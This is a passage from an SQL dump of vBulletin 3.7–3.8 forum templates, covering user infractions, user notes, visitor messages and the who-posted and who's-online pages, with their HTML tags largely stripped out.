    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_new_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrative_note]
    \r\n \r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n $vbphrase[message_to_user]
    \r\n \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875510, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1692, -1, 'userinfractionbit', '\r\n \r\n \".(($show[\'count\']) ? (\"$count\") : (\"\")).\"\r\n $infraction[points]\r\n $expires\r\n \".(($show[\'warning\']) ? (\"\") : (\" \")).\"\r\n', '\r\n \r\n $count\r\n $infraction[points]\r\n $expires\r\n  \r\n', 'template', 1155937480, 'vBulletin Solutions', '3.6.1', 'vbulletin'), (1693, -1, 'userinfraction_banbit', '\r\n  $bangroup\r\n $points\r\n $infractions\r\n $period\r\n', '\r\n  $bangroup\r\n $points\r\n $infractions\r\n $period\r\n', 'template', 1157583659, 'vBulletin Solutions', '3.6.1', 'vbulletin'), (1694, -1, 'userinfraction_groupbit', '\r\n \r\n\" . construct_phrase(\"$vbphrase[x_y_points]\", \"$grouptitle\", \"$points\") . \"\r\n', '\r\n \r\n$vbphrase[x_y_points]\r\n', 'template', 1150141557, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'), (1695, -1, 'userinfraction_infobit', '\r\n \\\"\\\"\r\n \r\n\r\n \".(($infraction[postid]) ? (\"\r\n \".(($show[\'postdeleted\']) ? (\"\r\n $vbphrase[n_a]\r\n \") : (\"\r\n \".(($show[\'threadtitle\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$infraction[postid]#post$infraction[postid]\\\">$infraction[title]\r\n \") : (\"\r\n $vbphrase[private]\r\n \")).\"\r\n \")).\"\r\n \") : (\"\r\n \".(($infraction[\'points\']) ? (\"\r\n $vbphrase[profile_infraction]\r\n \") : (\"\r\n $vbphrase[profile_warning]\r\n \")).\"\r\n \")).\"\r\n\r\n \r\n $infraction[dateline]
    $infraction[timeline]
    \r\n \r\n\r\n \".(($show[\'reversed\']) ? (\"\r\n $vbphrase[reversed]\r\n \") : (\"\r\n \".(($show[\'expired\']) ? (\"\r\n $vbphrase[expired]\r\n \") : (\"\r\n \".(($show[\'neverexpires\']) ? (\"$vbphrase[never]\") : (\"$infraction[expires_dateline]
    $infraction[expires_timeline]\")).\"\r\n \")).\"\r\n \")).\"\r\n
    \r\n \r\n\r\n $infraction[points]\r\n $infraction[reason]\r\n session->vars[\'sessionurl\'] . \"u=$infraction[whoadded]\\\">$infraction[username]\r\n \".(($show[\'reverse\']) ? (\"session->vars[\'sessionurl\'] . \"do=view&infractionid=$infraction[infractionid]\\\">$vbphrase[view]\") : (\"\")).\"\r\n', '\r\n \"\"\r\n \r\n\r\n \r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n $infraction[title]\r\n \r\n $vbphrase[private]\r\n \r\n \r\n \r\n \r\n $vbphrase[profile_infraction]\r\n \r\n $vbphrase[profile_warning]\r\n \r\n \r\n\r\n \r\n $infraction[dateline]
    $infraction[timeline]
    \r\n \r\n\r\n \r\n $vbphrase[reversed]\r\n \r\n \r\n $vbphrase[expired]\r\n \r\n $vbphrase[never]$infraction[expires_dateline]
    $infraction[expires_timeline]
    \r\n
    \r\n
    \r\n
    \r\n \r\n\r\n $infraction[points]\r\n $infraction[reason]\r\n $infraction[username]\r\n $vbphrase[view]\r\n', 'template', 1169636008, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1696, -1, 'userinfraction_view', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[user_infraction]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'reverseoption\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n \".(($show[\'warning\']) ? (\"$vbphrase[reverse_this_warning]\") : (\"$vbphrase[reverse_this_infraction]\")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
    $vbphrase[reversal_reason]:
    \r\n \r\n
    \r\n \r\n\r\n \r\n\r\n

    \r\n
    \r\n
    \r\n $vbphrase[removal_of_this_infraction]\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'postinfo\']) ? (\"$vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]
    \".(($postinfo[\'title\']) ? (\"$vbphrase[post]: session->vars[\'sessionurl\'] . \"p=$postinfo[postid]#post$postinfo[postid]\\\">$postinfo[title]\") : (\"session->vars[\'sessionurl\'] . \"p=$postinfo[postid]#post$postinfo[postid]\\\">$vbphrase[view_post]\")).\"
    \") : (\"\")).\"\r\n $vbphrase[user_infraction]\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $infractioninfo[status]\r\n
    \r\n $infractioninfo[title]\r\n
    \r\n
    \r\n\r\n \".(($show[\'expires\']) ? (\"\r\n
    \r\n $vbphrase[expires]\r\n
    \r\n \".(($show[\'never\']) ? (\"\r\n $vbphrase[never]\r\n \") : (\"\r\n $infractioninfo[expires_time] $infractioninfo[expires_date]\r\n \")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($infractioninfo[\'reason\']) ? (\"\r\n
    \r\n $vbphrase[reason]\r\n
    \r\n $infractioninfo[reason]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[left_by]\r\n \r\n
    \r\n\r\n \".(($show[\'note\']) ? (\"\r\n
    \r\n $vbphrase[administrative_note]\r\n
    \r\n $infractioninfo[note]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'expired\']) ? (\"\r\n
    \r\n $vbphrase[expired]\r\n
    \r\n $infractioninfo[expired_time] $infractioninfo[expired_date]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'reversed\']) ? (\"\r\n
    \r\n $vbphrase[reversed]\r\n
    \r\n session->vars[\'sessionurl\'] . \"u=$infractioninfo[actionuserid]\\\">$infractioninfo[actionusername]
    \r\n \".(($infractioninfo[actionreason]) ? (\"$infractioninfo[actionreason]
    \") : (\"\")).\"\r\n $infractioninfo[reversed_time] $infractioninfo[reversed_date]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'disthread\']) ? (\"\r\n
    \r\n $vbphrase[discussion_thread]\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[user_infraction]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[reverse_this_warning]$vbphrase[reverse_this_infraction]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
    $vbphrase[reversal_reason]:
    \r\n \r\n
    \r\n \r\n\r\n \r\n\r\n

    \r\n
    \r\n
    \r\n $vbphrase[removal_of_this_infraction]\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[reverse_this_warning]$vbphrase[reverse_this_infraction]\" tabindex=\"1\" accesskey=\"d\" />\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]
    $vbphrase[post]: $postinfo[title]$vbphrase[view_post]
    \r\n $vbphrase[user_infraction]\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $infractioninfo[status]\r\n
    \r\n $infractioninfo[title]\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[expires]\r\n
    \r\n \r\n $vbphrase[never]\r\n \r\n $infractioninfo[expires_time] $infractioninfo[expires_date]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[reason]\r\n
    \r\n $infractioninfo[reason]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[left_by]\r\n
    \r\n $infractioninfo[username]
    \r\n $infractioninfo[time] $infractioninfo[date]\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrative_note]\r\n
    \r\n $infractioninfo[note]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[expired]\r\n
    \r\n $infractioninfo[expired_time] $infractioninfo[expired_date]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[reversed]\r\n
    \r\n $infractioninfo[actionusername]
    \r\n $infractioninfo[actionreason]
    \r\n $infractioninfo[reversed_time] $infractioninfo[reversed_date]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[discussion_thread]\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875495, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1697, -1, 'usernote', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[user_notes_for_x]\", \"$userinfo[username]\") . \"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'pagenav\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \".(($show[\'addnote\']) ? (\"session->vars[\'sessionurl\'] . \"do=newnote&u=$userinfo[userid]\\\">$vbphrase[post_new_user_note]\") : (\"\")).\" $pagenav
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \" . construct_phrase(\"$vbphrase[user_notes_for_x]\", \"$userinfo[username]\") . \"
    \r\n\r\n\".(($show[\'notes\']) ? (\"\r\n\r\n $spacer_close\r\n
    \r\n $notebits\r\n
    \r\n $spacer_open\r\n\r\n\") : (\"\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n  
    \r\n \" . construct_phrase(\"$vbphrase[x_does_not_have_any_notes]\", \"$userinfo[username]\") . \"\r\n
     \r\n
    \r\n
    \r\n\")).\"\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'pagenav\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \".(($show[\'addnote\']) ? (\"session->vars[\'sessionurl\'] . \"do=newnote&u=$userinfo[userid]\\\">$vbphrase[post_new_user_note]\") : (\"\")).\" $pagenav
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $forumrules$forumjump
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - <phrase 1=\"$userinfo[username]\">$vbphrase[user_notes_for_x]</phrase>\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[post_new_user_note] $pagenav
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[user_notes_for_x]
    \r\n\r\n\r\n\r\n $spacer_close\r\n
    \r\n $notebits\r\n
    \r\n $spacer_open\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n  
    \r\n $vbphrase[x_does_not_have_any_notes]\r\n
     \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[post_new_user_note] $pagenav
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $forumrules$forumjump
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208860166, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1698, -1, 'usernote_note', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\".(($show[\'editnote\']) ? (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_user_note]\r\n\") : (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[new_user_note]\r\n\")).\"\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'editnote\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[delete_user_note]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[delete_user_note]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_delete_user_note_check_box]
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \".(($show[\'editnote\']) ? (\"$vbphrase[edit_user_note]\") : (\"$vbphrase[post_new_user_note]\")).\"
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n $vbphrase[title]:
    \r\n \r\n
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $forumrules$forumjump
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n $vboptions[bbtitle] - $vbphrase[edit_user_note]\r\n\r\n $vboptions[bbtitle] - $vbphrase[new_user_note]\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[delete_user_note]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[delete_user_note]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_delete_user_note_check_box]
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_user_note]$vbphrase[post_new_user_note]
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n $vbphrase[title]:
    \r\n \r\n
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $forumrules$forumjump
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875585, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1699, -1, 'visitormessage_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[delete_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'edit\']) ? (\"$vbphrase[user]: session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[username]\r\n $vbphrase[edit_message]$vbphrase[edit_visitor_message]\r\n \") : (\"\r\n $vbphrase[post_a_message]$vbphrase[post_new_visitor_message]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \".(($show[\'edit\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \".(($show[\'edit\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($messagebits) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[message_dialog]\r\n
    \r\n
    \r\n\r\n $messagebits\r\n\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[delete_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[user]: $userinfo[username]\r\n $vbphrase[edit_message]$vbphrase[edit_visitor_message]\r\n \r\n $vbphrase[post_a_message]$vbphrase[post_new_visitor_message]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[message_dialog]\r\n
    \r\n
    \r\n\r\n $messagebits\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1213617623, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1700, -1, 'visitormessage_preview', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n
      $errorlist
    \r\n \r\n \") : (\"\r\n\r\n \".(($newpost[\'title\']) ? (\"\r\n \r\n
    \r\n $message[title]\r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n \")).\"\r\n
    \r\n\r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n
    \r\n \r\n \r\n
      $errorlist
    \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n $message[title]\r\n
    \r\n
    \r\n \r\n
    \r\n $previewmessage\r\n
    \r\n
    \r\n\r\n
    ', 'template', 1205156504, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'), (1701, -1, 'visitormessage_simpleview', '
    \r\n\r\n
    \r\n
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\">$message[username]\r\n
    \r\n $message[date]\".((!$show[\'detailedtime\']) ? (\", $message[time]\") : (\"\")).\"\r\n
    \r\n\r\n
    $message[message]
    \r\n
    \r\n\r\n\r\n \".(($show[\'moderation\']) ? (\"\r\n \\\"$vbphrase[moderated_visitor_message]\\\"\r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    ', '
    \r\n\r\n
    \r\n
    \r\n $message[username]\r\n
    \r\n $message[date], $message[time]\r\n
    \r\n\r\n
    $message[message]
    \r\n
    \r\n\r\n\r\n \r\n \"$vbphrase[moderated_visitor_message]\"\r\n \r\n\r\n
    \r\n
    ', 'template', 1219144986, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1702, -1, 'visitormessage_simpleview_deleted', '
    \r\n\r\n
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\">$message[username]\r\n\r\n\r\n
    \r\n $message[date]\".((!$show[\'detailedtime\']) ? (\", $message[time]\") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason]: $message[del_reason]\") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n
    ', '
    \r\n\r\n
    \r\n $message[username]\r\n\r\n\r\n
    \r\n $message[date], $message[time]\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason]: $message[del_reason]\r\n
    \r\n\r\n
    \r\n
    ', 'template', 1219144781, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1703, -1, 'WHOPOSTED', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[who_posted] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n$posters\r\n\r\n \r\n\r\n
    \r\n $vbphrase[who_posted]\r\n
    \" . construct_phrase(\"$vbphrase[total_posts_x]\", \"$totalposts\") . \"
    \r\n
    $vbphrase[username]$vbphrase[posts]
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[who_posted] - $vboptions[bbtitle]\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n$posters\r\n\r\n \r\n\r\n
    \r\n $vbphrase[who_posted]\r\n
    $vbphrase[total_posts_x]
    \r\n
    $vbphrase[username]$vbphrase[posts]
    \r\n\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1704, -1, 'whopostedbit', '\r\n \r\n \".(($show[\'memberlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\" target=\\\"_blank\\\">$post[username]\r\n \") : (\"\r\n $post[username]\r\n \")).\"\r\n \r\n \".(($post[\'userid\']) ? (\"session->vars[\'sessionurl\'] . \"do=finduser&userid=$post[userid]&searchthreadid=$threadinfo[threadid]\\\" onclick=\\\"opener.location=(\'search.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=finduser&userid=$post[userid]&searchthreadid=$threadinfo[threadid]\'); self.close();\\\">$post[posts]\") : (\"$post[posts]\")).\"\r\n', '\r\n \r\n \r\n $post[username]\r\n \r\n $post[username]\r\n \r\n \r\n $post[posts]$post[posts]\r\n', 'template', 1264029590, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1705, -1, 'WHOSONLINE', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\".(($show[\'refresh\']) ? (\"\r\n \".((is_browser(\'mozilla\')) ? (\"\r\n \r\n \") : (\"\r\n options[\'WOLrefresh\'] . \";url=online.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"order=$sortorder&sort=$sortfield&pp=$perpage&page=$pagenumber$refreshargs\\\" />\r\n \")).\"\r\n\") : (\"\")).\"\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[whos_online]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \".(($show[\'ip\']) ? (\"\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"\") : (\"\")).\"\r\n\r\n$onlinebits\r\n
    \r\n \r\n $vbphrase[reload_this_page]\r\n \r\n \" . construct_phrase(\"$vbphrase[x_members_and_y_guests]\", \"$numbervisible\", \"$numberguests\") . \"
    \" . construct_phrase(\"$vbphrase[most_users_ever_online_was_x_y_at_z]\", \"$recordusers\", \"$recorddate\", \"$recordtime\") . \"\r\n
    \r\n \r\n $vbphrase[last_activity] $sortarrow[time]\r\n \r\n $vbphrase[username] $sortarrow[username]\r\n $vbphrase[location_temp] $sortarrow[location]$vbphrase[ip_address]$vbphrase[instant_messaging]
